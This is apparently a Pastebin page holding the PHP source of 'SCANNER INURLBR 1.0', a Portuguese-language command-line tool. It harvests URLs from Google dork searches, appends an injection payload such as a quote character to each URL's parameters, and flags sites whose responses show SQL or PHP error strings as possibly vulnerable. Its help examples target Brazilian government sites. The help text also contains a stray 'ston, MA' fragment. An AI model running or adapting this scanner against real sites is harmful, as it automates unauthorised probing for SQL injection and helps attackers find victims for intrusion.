SHARE
TWEET

SCANNER INURL BR / TERMINAL

Googleinurl Nov 26th, 2013 1,811 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. echo "\n\nDOWNLOAD NOVO SCRIPT::::=> https://github.com/googleinurl/SCANNER-INURLBR\n\n";
  4. exit();
  5. error_reporting(1);
  6. set_time_limit(0);
  7. ini_set('display_errors', 1);
  8. ini_set('max_execution_time', 0);
  9. ini_set('allow_url_fopen', 1);
  10.  
  11. if (!isset($_SESSION)) {
  12.     session_start();
  13. }
  14.  
  15. function plus() {
  16.     ob_flush();
  17.     flush();
  18. }
  19.  
  20. $googleHost = "
  21. ,www.google.com.br,www.google.pt,www.google.com.bo,www.google.com.my,www.google.ru
  22. ,www.google.co.jp,www.google.com.ar,www.google.es,www.google.it,www.google.co.uk
  23. ,www.google.com,www.google.ac,www.google.ad,www.google.ae,www.google.com.af
  24. ,www.google.com.ag,www.google.com.ai,www.google.am,www.google.it.ao,www.google.com.ar
  25. ,www.google.as,www.google.at,www.google.com.au,www.google.az,www.google.ba,www.google.com.bd
  26. ,www.google.be,www.google.bf,www.google.bg,www.google.com.bh,www.google.bi,www.google.bj
  27. ,www.google.com.bn,www.google.com.bo,www.google.com.br,www.google.bs,www.google.co.bw
  28. ,www.google.com.by,www.google.com.bz,www.google.ca,www.google.com.kh,www.google.cc
  29. ,www.google.cd,www.google.cf,www.google.cat,www.google.cg,www.google.ch,www.google.ci
  30. ,www.google.co.ck,www.google.cl,www.google.cm,www.google.cn,www.google.com.co,www.google.co.cr
  31. ,www.google.com.cu,www.google.cv,www.google.cz,www.google.de,www.google.dj,www.google.dk,www.google.dm
  32. ,www.google.com.do,www.google.dz,www.google.com.ec,www.google.ee,www.google.com.eg,www.google.es
  33. ,www.google.com.et,www.google.fi,www.google.com.fj,www.google.fm,www.google.fr,www.google.ga
  34. ,www.google.ge,www.google.gf,www.google.gg,www.google.com.gh,www.google.com.gi,www.google.gl
  35. ,www.google.gm,www.google.gp,www.google.gr,www.google.com.gt,www.google.gy,www.google.com.hk
  36. ,www.google.hn,www.google.hr,www.google.ht,www.google.hu,www.google.co.id,www.google.iq
  37. ,www.google.ie,www.google.co.il,www.google.im,www.google.co.in,www.google.io,www.google.is
  38. ,www.google.it,www.google.je,www.google.com.jm,www.google.jo,www.google.co.jp,www.google.co.ke
  39. ,www.google.ki,www.google.kg,www.google.co.kr,www.google.com.kw,www.google.kz,www.google.la
  40. ,www.google.com.lb,www.google.com.lc,www.google.li,www.google.lk,www.google.co.ls,www.google.lt
  41. ,www.google.lu,www.google.lv,www.google.com.ly,www.google.co.ma,www.google.md,www.google.me
  42. ,www.google.mg,www.google.mk,www.google.ml,www.google.mn,www.google.ms,www.google.com.mt
  43. ,www.google.mu,www.google.mv,www.google.mw,www.google.com.mx,www.google.com.my,www.google.co.mz
  44. ,www.google.com.na,www.google.ne,www.google.com.nf,www.google.com.ng,www.google.com.ni,www.google.nl
  45. ,www.google.no,www.google.com.np,www.google.nr,www.google.nu,www.google.co.nz,www.google.com.om
  46. ,www.google.com.pa,www.google.com.pe,www.google.com.ph,www.google.com.pk,www.google.pn
  47. ,www.google.com.pr,www.google.ps,www.google.pt,www.google.com.py,www.google.com.qa,www.google.ro
  48. ,www.google.rs,www.google.ru,www.google.rw,www.google.com.sa,www.google.com.sb,www.google.sc
  49. ,www.google.se,www.google.com.sg,www.google.sh,www.google.si,www.google.sk,www.google.com.sl
  50. ,www.google.sn,www.google.sm,www.google.so,www.google.st,www.google.com.sv,www.google.td
  51. ,www.google.tg,www.google.co.th,www.google.tk,www.google.tl,www.google.tm,www.google.to,www.google.com.tn
  52. ,www.google.com.tr,www.google.tt,www.google.com.tw,www.google.co.tz,www.google.com.ua,www.google.co.ug
  53. ,www.google.co.uk,www.google.us,www.google.com.uy,www.google.co.uz,www.google.com.vc,www.google.co.ve
  54. ,www.google.vg,www.google.co.vi,www.google.com.vn,www.google.vu,www.google.ws,www.google.co.za
  55. ,www.google.co.zm,www.google.co.zw";
  56. $googleHost = explode(",", trim($googleHost));
  57.  
  58.  
  59.  
  60.  
  61. ################################################################################################################################################################
  62. #MENU AJUDA#####################################################################
  63. if (isset($argv[1]) && $argv[1] == "ajuda") {
  64.     system("command clear");
  65.     $menu = '----------------------------------------------------------------------------------------------------------------------------
  66.     _       _ _   _ ____    _    
  67.    / \     | | | | |  _ \  / \  
  68.   / _ \ _  | | | | | | | |/ _ \  
  69.  / ___ \ |_| | |_| | |_| / ___ \
  70. /_/   \_\___/ \___/|____/_/   \_\ ';
  71.     $menu .= "\n\033[06;42m[ SCANNER INURLBR 1.0 / CONSOLE ]\033[0m \n";
  72.     $menu.= "----------------------------------------------------------------------------------------------------------------------------\r\n
  73.    *  SCANNER INURLBR     1.0
  74.    *  PHP Version         5.4.7
  75.    *  php5-curl           LIB
  76.     *  cURL support     enabled
  77.     *  cURL Information 7.24.0
  78.    *  Apache              2.4
  79.    *  allow_url_fopen =   On
  80.    *  Motor de busca      GOOGLE
  81.    *  Permissão            Leitura & Escrita
  82.    *  BUSCA POSSÍVEIS VULNERABILIDADES
  83.    *  SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
  84.    *  OPÇÕES PARA SETAR PROXY.
  85.    *  MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
  86.    *  SETAR EXPLOIT.
  87.    *  PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
  88.    *  GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
  89.    *  fb.com/GoogleINURL
  90.    *  twitter.com/GoogleINURL
  91.    *  blog.inurl.com.br\n
  92.    
  93.    --host='www.google.com.br'
  94.    --dork='sua dork'
  95.    --arquivo='seusResultados.txt'
  96.    --tipoerro='1 ou 2'
  97.    --exploit='O que vai ser injetado no final de cada url'
  98.    --achar='Funciona com Tipoerro 2 para procurar strings personalizadas em cada URL'      
  99.    --ipproxy='IP PROXY EX: 172.16.0.150'        
  100.    --porta='PORTA do proxy'
  101.    
  102.     O PARÂMETRO --tipoerro tem duas opções:
  103. ston, MA
  104.     1 - O Scanner vai procurar erros padrões do script SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
  105.         O mesmo vinculado com seu EXPLOIT que pode ser deixado vazio --exploit='' o exploit sempre será usado no final das urls,Padrão básico
  106.          sqlinjection.
  107.     2 - Opção para personalizar sua execução onde é habilitado o parâmetro --achar='',Achar funciona para procurar sua definição dentro das urls encontradas.
  108.         Ex[1]: --achar='WordPress' isso vai procurar a palavra WordPress em todas urls encontradas pelo scanner.
  109.         Ex[2]: --tipoerro='2' --exploit='wp-login.php'  --achar='WordPress'\n\r";
  110.  
  111.     $menu.= "\n\r\033[1;37m----------------------------------------------------------------------------------------------------------------------------\033[0m \n";
  112.     $menu.= "php botConsole.php \033[01;33m--host=\033[0m'www.google.com.br' \033[01;33m--dork=\033[0m'site:.gov.br inurl:php id' \033[01;33m--arquivo=\033[0m'resultado.txt' \033[01;33m--tipoerro=\033[0m'1' \033[01;33m--exploit=\033[0m'--´0x27;' \r\n";
  113.     $menu.= "php botConsole.php \033[01;33m--host=\033[0m'www.google.com.br' \033[01;33m--dork=\033[0m'site:.gov.br inurl:php id' \033[01;33m--arquivo=\033[0m'resultado.txt' \033[01;33m--tipoerro=\033[0m'2' \033[01;33m--exploit=\033[0m'/admin/index.php' \033[01;33m--achar=\033[0m'version 4.1'\r\n";
  114.     $menu.= "php botConsole.php \033[01;33m--host=\033[0m'www.google.com.br' \033[01;33m--dork=\033[0m'site:.gov.br inurl:php id' \033[01;33m--arquivo=\033[0m'resultado.txt' \033[01;33m--tipoerro=\033[0m'2' \033[01;33m--exploit=\033[0m'/admin/index.php' \033[01;33m--achar=\033[0m'version 4.1' \033[01;33m--ipproxy=\033[0m'172.16.0.150' \033[01;33m--porta=\033[0m'8080'\r\n";
  115.     $menu.= "php botConsole.php \033[01;33majuda\033[0m\n";
  116.     $menu.= "php botConsole.php \033[01;33mhosts\033[0m #Lista de hosts do google.\n";
  117.     $menu.= "\033[1;37m----------------------------------------------------------------------------------------------------------------------------\033[0m \n";
  118.     echo $menu;
  119.     exit();
  120. }
  121. //\033[06;42m
  122. if (isset($argv[1]) && $argv[1] == "hosts") {
  123.     system("command clear");
  124.     $menu = '----------------------------------------------------------------------------------------------------------------------------
  125.  _   _  ___  ____ _____ ____     ____  ___   ___   ____ _     _____
  126. | | | |/ _ \/ ___|_   _/ ___|   / ___|/ _ \ / _ \ / ___| |   | ____|
  127. | |_| | | | \___ \ | | \___ \  | |  _| | | | | | | |  _| |   |  _|  
  128. |  _  | |_| |___) || |  ___) | | |_| | |_| | |_| | |_| | |___| |___
  129. |_| |_|\___/|____/ |_| |____/   \____|\___/ \___/ \____|_____|_____|';
  130.     $menu .= "\n \033[01;13m\033[06;42m\033[01;13m[ SCANNER INURLBR 1.0 / CONSOLE ]\033[0m \n";
  131.     echo $menu.= "----------------------------------------------------------------------------------------------------------------------------\r\n";
  132.  
  133.     foreach ($googleHost as $key => $value) {
  134.         echo (isset($value) && !empty($value)) ? "\033[02;31m// \033[0m{$value}" : NULL;
  135.     }
  136.  
  137.     echo "\r\nTOTAL DE HOSTS...:\033[01;33m" . count($googleHost) . "\033[0m\r\n";
  138.     exit();
  139. }
  140.  
  141. ################################################################################################################################################################
  142. #CONFIGURAR#####################################################################
  143. $config[] = array();
  144. $config['host'] = validar($_SERVER['argv'], 1, 'host');
  145. $config['dork'] = urlencode(validar($_SERVER['argv'], 2, 'dork'));
  146. $config['arquivo'] = validar($_SERVER['argv'], 3, 'arquivo');
  147. $config['tipoerro'] = validar($_SERVER['argv'], 4, 'tipoerro');
  148. $config['exploit'] = (isset($_SERVER['argv'][5]) && !empty($_SERVER['argv'][5])) ? validar($_SERVER['argv'], 5, 'exploit') : NULL;
  149. $config['achar'] = (isset($_SERVER['argv'][6]) && !empty($_SERVER['argv'][6]) && isset($config['tipoerro']) && $config['tipoerro'] == '2') ? validar($_SERVER['argv'], 6, 'achar') : NULL;
  150. $config['ipProxy'] = (isset($_SERVER['argv'][7]) && !empty($_SERVER['argv'][7])) ? validar($_SERVER['argv'], 7, 'ipproxy') : NULL;
  151. $config['porta'] = (isset($_SERVER['argv'][8]) && !empty($_SERVER['argv'][8])) ? validar($_SERVER['argv'], 8, 'porta') : NULL;
  152.  
  153. $config['url'] = "/search?q={$config['dork']}&num=1900&btnG=Search";
  154. $config['port'] = 80;
  155. $config['host'] = trim($config['host']);
  156. $packet = "GET {$config['url']} HTTP/1.0\r\n";
  157. $packet.="Host: {$config['host']}\r\n";
  158. $packet.="Connection: Close\r\n\r\n";
  159.  
  160. $_SESSION['config'] = $config;
  161.  
  162. ################################################################################################################################################################
  163. #FORMATAÇÃO DE ARGUMENTOS#######################################################
  164.  
  165. function argumentos($argv, $campo) {
  166.     $_ARG = array();
  167.     foreach ($argv as $arg) {
  168.         if (ereg('--[a-zA-Z0-9]*=.*', $arg)) {
  169.             $str = split("=", $arg);
  170.             $arg = '';
  171.             $key = str_replace("--", '', $str[0]);
  172.             for ($i = 1; $i < count($str); $i++) {
  173.                 $arg .= $str[$i];
  174.             }
  175.             $_ARG[$key] = $arg;
  176.         } elseif (ereg('-[a-zA-Z0-9]', $arg)) {
  177.             $arg = str_replace("-", '', $arg);
  178.             $_ARG[$arg] = 'true';
  179.         }
  180.     }
  181.     return $_ARG[$campo];
  182. }
  183.  
  184. ################################################################################################################################################################
  185. #VALIDAÇÃO DE ARGUMENTOS########################################################
  186.  
  187. function validar($argv, $id, $campo) {
  188.  
  189.     if (isset($argv[$id]) && !empty($argv[$id]) && ereg('--[a-zA-Z0-9]*=.*', $argv[$id])) {
  190.  
  191.         $validacao = argumentos($argv, $campo);
  192.     } else {
  193.         echo "\nVerifique o parâmetro..:{$campo}\n";
  194.         exit();
  195.     }
  196.     return $validacao;
  197. }
  198.  
  199. ################################################################################################################################################################
  200. #ENVIAR INFORMAÇÕES PARA GOOGLE#################################################
  201.  
  202. function eviarPacote($packet, $config) {
  203.     echo "DEBUG:\r\n";
  204.     print_r($config);
  205.     echo "\r\n";
  206.     if (isset($config['ipProxy'])) {
  207.  
  208.  
  209.         $ock = fsockopen($config['ipProxy'], $config['porta']);
  210.         if (!$ock) {
  211.             echo "Proxy não responde {$config['ipProxy']}:{$config['porta']}\r\n";
  212.             die;
  213.         }
  214.     } else {
  215.  
  216.         $ock = fsockopen(gethostbyname($config['host']), $config['port']);
  217.         if (!$ock) {
  218.             echo "Host não responde {$config['host']}:{$config['port']}\r\n";
  219.             die;
  220.         }
  221.     }
  222.  
  223.     fputs($ock, $packet);
  224.     $buffer = NULL;
  225.     while (!feof($ock)) {
  226.         $buffer.=fgets($ock);
  227.     }
  228.     fclose($ock);
  229.     return($buffer);
  230. }
  231.  
  232. ################################################################################################################################################################
  233. #REQUEST PARA CAPTURA DE URL#################################################
  234.  
  235. function infoserver($url_) {
  236.     plus();
  237.     $c = curl_init();
  238.     curl_setopt($c, CURLOPT_URL, $url_);
  239.     curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.' . date('s') . '(Windows; U; Windows NT 6.' . date('s') . '; en-US; rv:' . date('s') . date('s') . '.1.2) Gecko/' . date('sysdsms') . date('s') . ' Firefox/3.' . date('s') . '.2 GTB5');
  240.     curl_setopt($c, CURLOPT_HEADER, 1);
  241.     curl_setopt($c, CURLOPT_NOBODY, 0);
  242.     curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  243.     curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
  244.     curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
  245.     curl_setopt($c, CURLOPT_VERBOSE, 0);
  246.     curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
  247.     curl_setopt($c, CURLOPT_COOKIEJAR, 'cookie.txt');
  248.  
  249.  
  250.     $corpo = curl_exec($c);
  251.     $server = curl_getinfo($c);
  252.     $sys = get_headers($url_);
  253.  
  254.     if (isset($corpo)) {
  255.  
  256.         $_SESSION['config']['erroReturn'] = verificaErro($corpo);
  257.         $_SESSION['config']['vull_style'] = (isset($_SESSION['config']['erroReturn']) && !empty($_SESSION['config']['erroReturn'])) ? "\033[1;37m:::[0xPOSSÍVEL 0xVULNERÁVEL]:::\033[06;42m" : "\033[01;30m";
  258.         $_SESSION['config']['resultado_vull'].=(isset($_SESSION['config']['erroReturn']) && !empty($_SESSION['config']['erroReturn'])) ? "|{$url_}" : NULL;
  259.     } else {
  260.  
  261.         return FALSE;
  262.     }
  263.     plus();
  264.     return $info = "/HTTP_CODE:{$server['http_code']} /IP SERVER:{$server['primary_ip']} /PORTA SERVER:{$server['primary_port']} /WEB SERVER:{$sys['2']}";
  265. }
  266.  
  267. ################################################################################################################################################################
  268. #FILTRO DE URL DO RESULTADO GOOGLE##############################################
  269.  
  270. function formatarResult($html) {
  271.     plus();
  272.     echo "\033[05;31m0xCarregando...\033[0m\n";
  273.     preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%_/\?\=\~\-]+)#i', $html, $match);
  274.     $contUrl = 1;
  275.     $contTotal = 1;
  276.     $match[1] = array_unique($match[1]);
  277.     for ($i = 0; $i < count($match[1]); $i++) {
  278.         if (isset($match[1][$i]) && !strstr($match[1][$i], "google") && !strstr($match[1][$i], "php.net") && !strstr($match[1][$i], "youtube") && !strstr($match[1][$i], "orkut") && !strstr($match[1][$i], "schema") && !strstr($match[1][$i], "blogger") && !strstr($match[1][$i], "gstatic")) {
  279.  
  280.             $info = infoserver(gerarErroDB(urldecode($match[1][$i])));
  281.             $url = urldecode($match[1][$i]);
  282.             echo "\r\n\033[10;37m----------------------------------------------------------------------------------------------------------------------------\033[0m\n";
  283.             echo "0x[ \033[02;31m{$contUrl}\033[0m ] - {$_SESSION['config']['vull_style']}{$url}\033[0m\033[1;31m{$_SESSION['config']['exploit']}\033[0m\r\n\033[0;11m{$info}\n\033[0m";
  284.             echo (isset($_SESSION['config']['erroReturn']) && !empty($_SESSION['config']['erroReturn']) ? "\033[1;37m{$_SESSION['config']['erroReturn']}\033[0m\n" : "\033[0m");
  285.             echo "\033[10;37m----------------------------------------------------------------------------------------------------------------------------\033[0m\r\n";
  286.             $contUrl++;
  287.             $contTotal++;
  288.         }
  289.     }
  290.     plus();
  291.     $resultado = (isset($_SESSION['config']['resultado_vull'])) ? $_SESSION['config']['resultado_vull'] : exit();
  292.     $resultado = explode("|", $resultado);
  293.     $contRes = count($resultado) - 1;
  294.     $resultadotxt = NULL;
  295.     $nomeArquivo = "{$_SESSION['config']['arquivo']}";
  296.     $resultadotxt = base64_decode("U0NBTk5FUiBJTlVSTEJSIDEuMCAtIFsgYmxvZy5pbnVybC5jb20uYnIgXQ==") . " /DATA:" . date("d/m/Y H:i:s") . " /DORK: {$_SESSION['config']['dork']}  /EXPLOIT: {$_SESSION['config']['exploit']}\r\nTOTAL VULL:{$contRes}\r\n " . implode("\r\n", $resultado) . "\r\n\r\n";
  297.     $resultado = implode("\r\n", $resultado);
  298.     print_r("\r\nTOTAL DE URL's: {$contTotal}\r\nEXPLOIT USADO: {$_SESSION['config']['exploit']}\r\nDORK: {$_SESSION['config']['dork']}\r\nTOTAL DE POSSÍVEIS VULL: {$contRes}\r\nARQUIVO COM RESULTADO:{$nomeArquivo}\r\nLISTA:\r\n {$resultado}\r\n");
  299.  
  300.     $_SESSION['config']['resultado_vull'] = NULL;
  301.     $abrirtxt = fopen($nomeArquivo, "a");
  302.     if ($abrirtxt == false) {
  303.         die("\r\nNão foi possível criar o arquivo.");
  304.     }
  305.     $resultadotxt = str_replace("\033[01;31m", '', $resultadotxt);
  306.     $resultadotxt = str_replace("\033[0m", '', $resultadotxt);
  307.     fwrite($abrirtxt, $resultadotxt);
  308.     fclose($abrirtxt);
  309. }
  310.  
  311. ################################################################################################################################################################
  312. #VALIDANDO ERROS DENTRO DO HTML#################################################
  313.  
  314. function verificaErro($html_) {
  315.  
  316.     #ERROS BANCO DE DADOS
  317.    if (isset($_SESSION['config']['tipoerro']) && $_SESSION['config']['tipoerro'] == '1') {
  318.         $erro['MYSQL-01'] = 'mysql_';
  319.         $erro['MYSQL-02'] = 'You have an error in your SQL syntax;';
  320.         $erro['MYSQL-03'] = 'Warning: mysql_';
  321.         $erro['MYSQL-04'] = 'function.mysql';
  322.         $erro['MYSQL-05'] = 'MySQL result index';
  323.         $erro['MYSQL-06'] = 'syntax;';
  324.         $erro['MYSQL-07'] = 'MySQL';
  325.  
  326.         $erro['MICROSOFT-01'] = 'Microsoft JET Database';
  327.         $erro['MICROSOFT-02'] = 'ODBC Microsoft Access Driver';
  328.         $erro['MICROSOFT-03'] = '500 - Internal server error';
  329.         $erro['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
  330.         $erro['MICROSOFT-05'] = 'Unclosed quotes';
  331.         $erro['MICROSOFT-06'] = 'ADODB.Command';
  332.         $erro['MICROSOFT-07'] = 'ADODB.Field error';
  333.         $erro['MICROSOFT-08'] = 'Microsoft VBScript';
  334.  
  335.         $erro['ORACLE-01'] = 'Microsoft OLE DB Provider for Oracle';
  336.         $erro['ORACLE-02'] = 'ORA-';
  337.  
  338.         $erro['POSTGRESQL-01'] = 'pg_';
  339.         $erro['POSTGRESQL-02'] = 'Warning: pg_';
  340.         $erro['POSTGRESQL-03'] = 'PostgreSql Error:';
  341.  
  342.         #ERROS PHP
  343.        $erro['ERROPHP-01'] = 'Warning: include';
  344.         $erro['ERROPHP-02'] = 'Fatal error: include';
  345.         $erro['ERROPHP-03'] = 'Warning: require';
  346.         $erro['ERROPHP-04'] = 'Fatal error: require';
  347.         $erro['ERROPHP-05'] = 'ADODB_Exception';
  348.  
  349.         #ERROS ASP
  350.        $erro['ERROASP-01'] = 'Version Information: Microsoft .NET Framework';
  351.         $erro['ERROASP-02'] = "Server.Execute Error";
  352.  
  353.         #ERROS INDEFINIDOS
  354.        $erro['INDEFINIDO-01'] = 'SQL';
  355.         $erro['INDEFINIDO-02'] = 'Fatal error';
  356.         $erro['INDEFINIDO-03'] = 'Warning';
  357.     } else {
  358.  
  359.         $erro['ERRRO-PERSONALIZADO'] = $_SESSION['config']['achar'];
  360.     }
  361.     foreach ($erro as $campo => $valor) {
  362.  
  363.         if (validaBD($html_, $erro[$campo], $campo)) {
  364.             return("Tipo de erro: {$campo}  -  ERRO: {$erro[$campo]}");
  365.         }
  366.     }
  367. }
  368.  
  369. ################################################################################################################################################################
  370. #VERIFICAR ERROS DENTRO DO HTML2################################################
  371.  
  372. function validaBD($html_, $verificar, $bd) {
  373.  
  374.     return (strstr($html_, $verificar)) ? $bd : null;
  375. }
  376.  
  377. ################################################################################################################################################################
  378. #GERAR URL COM EXPLOIT##########################################################
  379.  
  380. function gerarErroDB($_url) {
  381.  
  382.     $_url = explode("=", $_url);
  383.     $get = max(array_keys($_url));
  384.     $get = $_url[$get];
  385.     return implode("=", str_replace($get, $get . ((isset($_SESSION['config']['exploit'])) ? $_SESSION['config']['exploit'] : NULL), $_url));
  386. }
  387.  
  388. ################################################################################################################################################################
  389. #COMEÇANDO SCANNER##############################################################
  390. system("command clear");
  391. $my = '----------------------------------------------------------------------------------------------------------------------------
  392.  ____   ____    _    _   _ _   _ _____ ____            ___ _   _ _   _ ____  _    
  393. / ___| / ___|  / \  | \ | | \ | | ____|  _ \          |_ _| \ | | | | |  _ \| |    
  394. \___ \| |     / _ \ |  \| |  \| |  _| | |_) |  _____   | ||  \| | | | | |_) | |    
  395.  ___) | |___ / ___ \| |\  | |\  | |___|  _ <  |_____|  | || |\  | |_| |  _ <| |___
  396. |____/ \____/_/   \_\_| \_|_| \_|_____|_| \_\         |___|_| \_|\___/|_| \_\_____|                                                                      
  397. ';
  398. $my .= "[ SCANNER INURLBR 1.0 / CONSOLE ]\n";
  399. $my .= "----------------------------------------------------------------------------------------------------------------------------\r\n";
  400. $my .= "0xHOST GOOGLE........: \033[02;31m{$_SESSION['config']['host']}\033[0m\n";
  401. $my .= "0xDORK...............: \033[02;31m{$_SESSION['config']['dork']}\033[0m\n";
  402. $my .= "0xEXPLOIT............: \033[02;31m{$_SESSION['config']['exploit']}\033[0m\n";
  403. $my .= "0xARQUIVO............: \033[02;31m{$_SESSION['config']['arquivo']}\033[0m\n";
  404. $my .= "0xTIPO DE ERRO.......: \033[02;31m{$_SESSION['config']['tipoerro']}\033[0m\n";
  405. $my .= "0xPROCURAR NO ALVO...: \033[02;31m{$_SESSION['config']['achar']}\033[0m\n";
  406. $my .= "0xIP PROXY...........: \033[02;31m{$_SESSION['config']['ipProxy']}\033[0m\n";
  407. $my .= "0xPORTA..............: \033[02;31m{$_SESSION['config']['porta']}\033[0m\n";
  408. $my .= "----------------------------------------------------------------------------------------------------------------------------\r\n";
  409. $my .= "0xCARREGANDO CONFIGURAÇÕES...\n";
  410. echo urldecode($my);
  411.  
  412. $html = eviarPacote($packet, $config);
  413. echo formatarResult($html);
  414. unset($_SESSION['config']);
  415. session_destroy();
  416. ?>
RAW Paste Data
Top